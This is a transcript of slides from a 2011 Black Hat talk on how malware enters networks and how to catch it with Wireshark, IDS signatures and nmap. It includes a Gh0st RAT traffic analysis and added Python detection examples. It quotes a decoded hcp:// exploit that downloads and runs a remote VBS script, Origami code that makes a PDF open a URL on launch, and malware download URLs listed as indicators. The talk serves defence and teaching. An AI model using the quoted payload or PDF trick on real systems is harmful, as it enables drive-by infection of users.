Taming worms, rats, dragons & more

Presentation on malware in your network and how to detect it with open-source tools. Presented at Black Hat Abu Dhabi 2011.


  1. 'Taming Worms, RATs, Dragons, Zombies & More…' by Christiaan Beek (An Intel company)
  2. Agenda • whoami • The game has changed • How malware enters your network • What goes wrong • Wireshark Kung-Fu • Countermeasures • Resources & credits • Wrap up
     LEGO® is a trademark of the LEGO Group of companies, which does not sponsor, authorize or endorse this presentation.
  3. > whoami • Christiaan Beek • Principal Architect • Foundstone EMEA IR & Forensics • Developer/Instructor MFIRE
  4. The game has changed (slide shows attack surfaces and campaigns): manufacturing, medical device, energy, database, SCADA, mobile, embedded, silicon, smart cars, social media, ATM/kiosk, apps, entertainment, virtual, RF/IR, web, Bluetooth; RSA, DuQu, Night Dragon, Stuxnet, Aurora, Zeus
  5. The game has changed (chart: Total Malware Samples, y-axis 0 to 70,000,000). Source: McAfee threat landscape Q2 report
  6. The game has changed
  7. Some statistics. The Gulf region is gaining interest from malware authors: • Number of internet users growing • Windows XP most used OS • Vulnerable IE or PDF readers
  8. Some statistics. Did you know: • Internet Explorer 6 has more than 473 publicly known vulnerabilities • So…
  9. Some statistics: http://www.ie6countdown
  10. Some statistics: Unpatched Windows XP + IE 6 =
  11. Some statistics: Gulf region malware spread vs global. Source: ThreatExpert & McAfee labs
  12. Some statistics – Most detected malware (map of the most detected malware families per country: Iran, Iraq, Lebanon, Jordan, Israel, Oman, Kuwait, Syria, United Arab Emirates, Saudi Arabia, Yemen). Source: ThreatExpert & McAfee labs
  13. Some statistics – Most detected malware: "The next slide contains scenes that some color-blind people may find disturbing"
  14. Some statistics – Most detected malware (the same per-country map as slide 12)
  15. What happened in Qatar? Source: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
  16. (image slide)
  17. How malware enters your network. Hint: 'it is between the keyboard and the chair'
  18. How malware enters your network. Top infection vectors: • Users browsing websites that have been infected with no outward sign of the compromise • Opening attachments • Or:
  19. How malware enters your network: user clicks on a link
  20. How malware enters your network: OR… user opens a PDF
  21. How malware enters your network. With a little effort…
      require 'origami'
      include Origami

      # Create a simple PDF document with Origami
      contents = ContentStream.new
      contents.write 'Black Hat Sneak Peek', :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15
      PDF.new.append_page(Page.new.setContents(contents)).save('Sneak peek.pdf')

      # Re-open it and attach an OpenAction: the reader follows the URI as soon as the document is opened
      pdf = PDF.read("Sneak peek.pdf")
      pdf.onDocumentOpen Action::URI.new("http://securitybananas.com")
      pdf.save('Sneak peek bhat.pdf')
  22. How malware enters your network. After x redirects: script executed: grab info
  23. How malware enters your network: the hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm URL with its script argument obfuscated through String.fromCharCode (decoded on the next slide)
  24. How malware enters your network (decoded): hcp://services/search?query=anything&topic=hcp://system/sysinf o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0 03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16 6::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
  25. How malware enters your network. Info sent: browser version, operating system, Adobe version, Flash version, Java version, etc.
  26. How malware enters your network (plugin-detection script served to the visitor, excerpt):
      var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0];
      try { var PluginDetect = { handler: function (c, b, a) { return function () { c(b, a) } [………….]
      initScript: function () { var c = this, a = navigator, e = "/", i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || ""; c.OS = 100; if (b) { var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win. * CE", 22.1, "Win. * Mobile", 22.2, "Pocket s * PC", 22.3, "
  27. How malware enters your network. Info gathered: browser version, operating system, Adobe version, Flash version, Java version, etc.
  28. How malware enters your network
  29. How malware enters your network: C&C server
  30. How malware traffic is hiding ► Techniques used to hide traffic: • Disguising malicious traffic as web traffic • Shortened or encoded URLs • IRC over HTTP
  31. ► Techniques used to hide traffic:
  32. What goes wrong?
  33. Problem #1 ► Many solutions, but how to use them? ► Education?
  34. Problem #2 ► No malware strategy ► Focus on the end-point ► But what is your end-point nowadays?
  35. Problem #3 ► No layered (malware) defense ► Traffic streams unclear
  36. Problem #4 ► How does malware work? ► How to recognize patterns & correlate?
  37. So....
  38. Wireshark Kung-Fu
  39. Custom/targeted malware ► Some recent samples of malware: • Spreading: shares, USB media, .exe infections • Search for AutoComplete information • Search for specific accounts • Keylogger • Created task to check if keylogger was running • Masked in DLL files • Upload results to FTP servers
  40. Custom/targeted malware ► IE AutoComplete data harvested (values masked):
      Type: 89c39569 Subtype: 0xf111f3e Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ]
      Type: e161255a Subtype: 0xe161255a
      IE AutoComplete: [address]=[Street ********* ,]
      IE AutoComplete: [ini_tmp]=[pa*******]
      IE AutoComplete: [name]=[p********]
      IE AutoComplete: [num]=[01*********]
      IE AutoComplete: [p0]=[******ADMIN]
      IE AutoComplete: [rech]=[SY*******]
      IE AutoComplete: [username]=[22*********]
  41. Custom/targeted malware ► As mentioned before, traffic is hidden using: • http(s) • ftp (traffic increase) • irc • TCP 445 (traffic increase) • TCP 53 (DNS) • Compression of traffic. Used for downloading payload, uploading information, command & control
  42. Custom/targeted malware ► Arming for detection
  43. Wireshark. Which filters can be used? First:
      tcp.dstport == 80 and http contains "GET"
      After analyzing this output, the fine-tuned filter:
      tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
  44. Wireshark ► Which filters can be used? DNS queries:
      dns contains "ru" or dns contains "cn" or dns contains "biz" or dns contains "dyndns.org" or dns contains "cc"
  45. T-shark ► T-shark: command line:
  46. Wireshark ► Example of Morto:
  47. Custom/targeted malware ► Chinese Gh0st RAT • Full analysis by Foundstone's Michael G. Spohn • Example of a Chinese RAT used in several campaigns • Research project to understand how it works
  48. Custom/targeted malware ► Chinese Gh0st RAT
  49. Custom/targeted malware ► Network analysis of Chinese Gh0st RAT • Command & Control (C2) packets consist of:
      1. A five byte packet header that contains the characters 'Gh0st'.
      2. A four byte integer that contains the size in bytes of the entire packet.
      3. A four byte integer that contains the size in bytes of the entire packet when uncompressed.
      4. A variable sized packet that contains the packet payload.
      The client sends small requests that contain commands, and the server responds to those commands with the requested data.
  50. Custom/targeted malware ► Example of commands • 50 commands used
  51. Custom/targeted malware ► Example of token codes • Used by the server to identify payloads to the client
  52. Custom/targeted malware ► Example of a login packet
  53. Custom/targeted malware ► Uncompressing the login payload: first byte 66 (0x66 = 102)
  54. Custom/targeted malware ► Look up 102 in the RAT's command value table:
  55. Custom/targeted malware ► Uncompressing the login payload: C0 A8 01 E0 = 192.168.1.249 (host IP address)
  56. Custom/targeted malware ► Uncompressing the login payload: '01' in this case means a webcam is present on the client
  57. Custom/targeted malware ► For the RE die-hards: Gh0st RAT LoginInfo structure
  58. Wireshark filter ► Chinese Gh0st RAT filter: "\x47\x68\x30\x73\x74" (= Gh0st)
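The framing walked through on slides 49 to 58, as an added Python example that is not from the presentation or from Foundstone's analysis: it constructs a sample frame, validates both size fields, inflates the payload, reads the token byte (0x66 = login), and scans a reassembled stream for frames the way the "Gh0st" filter does. Little-endian sizes, zlib compression and the field offsets in decode_login are assumptions.

```python
import struct
import zlib

# Gh0st C2 frame as the slides describe it: "Gh0st", 4-byte total packet size,
# 4-byte uncompressed payload size, then the compressed payload.
# Little-endian integers and zlib compression are assumptions of this example.
MAGIC = b"Gh0st"
HEADER_LEN = 13
TOKEN_NAMES = {102: "TOKEN_LOGIN"}  # 0x66 = 102 is the login token on the slides

def build_gh0st_packet(payload: bytes) -> bytes:
    """Frame a plaintext payload (used only to construct an offline sample)."""
    compressed = zlib.compress(payload)
    return MAGIC + struct.pack("<II", HEADER_LEN + len(compressed), len(payload)) + compressed

def parse_gh0st_packet(data: bytes) -> dict:
    """Validate the frame, inflate the payload and read its first byte as the token.
    Raises ValueError on any inconsistency so a scanner can skip false hits."""
    if len(data) < HEADER_LEN or data[:5] != MAGIC:
        raise ValueError("no Gh0st header")
    total, uncompressed = struct.unpack("<II", data[5:HEADER_LEN])
    if total != len(data):
        raise ValueError(f"size field {total} != {len(data)} bytes on the wire")
    payload = zlib.decompress(data[HEADER_LEN:])
    if len(payload) != uncompressed:
        raise ValueError("uncompressed size field does not match payload")
    return {"token": payload[0], "name": TOKEN_NAMES.get(payload[0], "UNKNOWN"), "payload": payload}

def decode_login(payload: bytes) -> dict:
    """Decode the fields the slides point at: token byte, 4 raw IP bytes, webcam flag.
    The offsets are a constructed layout, not Gh0st's real LoginInfo structure."""
    return {
        "token": payload[0],
        "ip": ".".join(str(b) for b in payload[1:5]),
        "webcam": payload[5] == 1,
        "host": payload[6:].split(b"\x00", 1)[0].decode("ascii"),
    }

def scan_stream(stream: bytes) -> list:
    """Detection: walk a reassembled TCP stream and parse every consistent
    Gh0st frame, skipping bytes that carry the magic but no valid frame."""
    hits, pos = [], stream.find(MAGIC)
    while pos != -1:
        try:
            total = struct.unpack("<I", stream[pos + 5:pos + 9])[0]
            hits.append(parse_gh0st_packet(stream[pos:pos + total]))
            pos = stream.find(MAGIC, pos + total)
        except (ValueError, struct.error, zlib.error):
            pos = stream.find(MAGIC, pos + 1)
    return hits

# Constructed sample: a login frame (token 0x66, host 10.0.0.5, webcam present)
# between unrelated bytes, plus a stray "Gh0st" that is not a valid frame.
LOGIN_PAYLOAD = bytes([0x66, 10, 0, 0, 5, 0x01]) + b"WORKSTATION-01\x00"
SAMPLE_STREAM = b"\x00noise\x00" + build_gh0st_packet(LOGIN_PAYLOAD) + b"Gh0stX"
```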
  59. Wireshark ► NetBIOS traffic
  60. Wireshark ► Traffic regarding TCP 445 (shares, SMB). Incoming file share access attempts:
      ((smb.cmd && ip.dst > internal network address) || (smb.cmd && ip.dst < internal network broadcast address))
  61. Wireshark ► SMB worm creating .exe on a share:
      smb.create.action == 2 and smb.file contains "exe"
  62. Wireshark ► SMB .exe detection. In the old days:
      smb.file contains "exe"
  63. Wireshark ► SMB .exe detection: Taddong developed a tool to capture SMB files in Wireshark. But… good news: it is now integrated in Wireshark version 1.5.1 (Dev)
  64. Wireshark ► SMB .exe detection: File > Export > Objects > SMB
  65. Wireshark ► SMB .exe detection:
  66. Wireshark DEMO
  67. COUNTERMEASURES
  68. Training & Education!!!!!
  69. Countermeasures
  70. Countermeasures ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet):
      RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|"
      TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|"
      VNC = "|52 46 42 20 30 30 33 2e 30 30|"
  71. Countermeasures ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls:
      CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|";
      ► Implement new signatures in IDS/DLP as they are learned
  72. Countermeasures ► Detect services on non-standard ports ► Nmap the internal network:
      nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
  73. Countermeasures ► Detect services on non-standard ports ► Probe discovered ports with Amap:
      amap -A -b -o out.amap <IP> <port> <port> ...
      or use the results.nmap file as input
  74. Countermeasures ► Implement IDS/HIPS/DLP rules to detect outbound GET requests for files by type (.exe, .bat, .dll etc.) in the URL:
      GET http://scan28.dosmokes.ce.ms/InstallSystemDefender_133.bin HTTP/1.0
      GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.45094.exe HTTP/1.1
  75. Countermeasures ► Implement IDS/HIPS/DLP rules to detect encoded URL extensions:
      GET http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6 4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166 E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2 7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D 442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3 BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4 DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1 A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
  76. Countermeasures ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions:
      GET http://65.75.156.141/Home/d.php?f=16&e=about.exe HTTP/1.1
      GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1
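The three detection ideas on slides 74 to 76 (executable extension in the URL, long hex-encoded query values, and base64 query values that decode to a download request) as one added Python check over constructed proxy log lines; this is example code, not from the presentation or any IDS product. The extension list, the 32-hex-character threshold and the "METHOD URL STATUS" log format are assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Extensions the slides single out (.exe, .bat, .dll etc.); the full list is an assumption.
EXEC_EXT = re.compile(r"\.(exe|bat|dll|bin|scr|vbs)(\b|$)", re.IGNORECASE)
HEX_BLOB = re.compile(r"^[0-9A-Fa-f]{32,}$")  # long hex-only value, as on slide 75

def try_base64(value: str):
    """Decode a query value as base64 if it plausibly is one, else None.
    Padding is normalised first, so over- or under-padded values still decode."""
    if not re.fullmatch(r"[A-Za-z0-9+/]{8,}=*", value):
        return None
    stripped = value.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def inspect_get(url: str) -> list:
    """Return the reasons a GET URL looks like a (possibly encoded) payload download."""
    reasons = []
    parts = urlsplit(url)
    if EXEC_EXT.search(parts.path):
        reasons.append("executable extension in path")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if EXEC_EXT.search(value):
            reasons.append(f"executable extension in query {key}")
        elif HEX_BLOB.match(value):
            reasons.append(f"long hex-encoded query {key}")
        else:
            decoded = try_base64(value)
            if decoded and EXEC_EXT.search(decoded):
                reasons.append(f"base64 query {key} decodes to {decoded!r}")
    return reasons

def scan_proxy_log(lines) -> list:
    """Apply inspect_get to every GET in 'METHOD URL STATUS' lines (constructed format)."""
    hits = []
    for line in lines:
        method, url = line.split()[:2]
        if method == "GET":
            reasons = inspect_get(url)
            if reasons:
                hits.append((url, reasons))
    return hits

# Constructed sample log; the first four URLs mirror the shapes shown on the slides.
SAMPLE_LOG = [
    "GET http://example.invalid/InstallSystemDefender_133.bin 200",
    "GET http://example.invalid/Home/d.php?f=16&e=about.exe 200",
    "GET http://example.invalid/Home/d.php?f=MTYmZT1hYm91dC5leGU== 200",
    "GET http://example.invalid/get2.php?c=PXWSQSZT&d=26606B67393230312E64636F317E3E3D21 200",
    "GET http://example.invalid/index.html 200",
]
```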
  77. Wrap up ► What have you learned? • The game has changed • Malware uses all kinds of ways to hide itself • Many tools to detect malware • But… • Invest in learning the tools and how malware works • Define a defense-in-depth malware strategy • Create awareness • Educate administrators AND management AND users
  78. Resources & credits ► Resources • Wireshark (http://www.wireshark.org) • Snort (http://www.sourcefire.com) • Nmap (http://www.insecure.org) • Amap (http://www.thc.org/thc-amap/) ► Special thanks to • Michael G. Spohn • Shane Shook • Tony Lee • Carric Dooley
  79. Shukran/Thank you! ► Keep in touch: • Christiaan_Beek @McAfee dot com ► Twitter: • @FSEMEA • @Foundstone • @ChristaanBeek
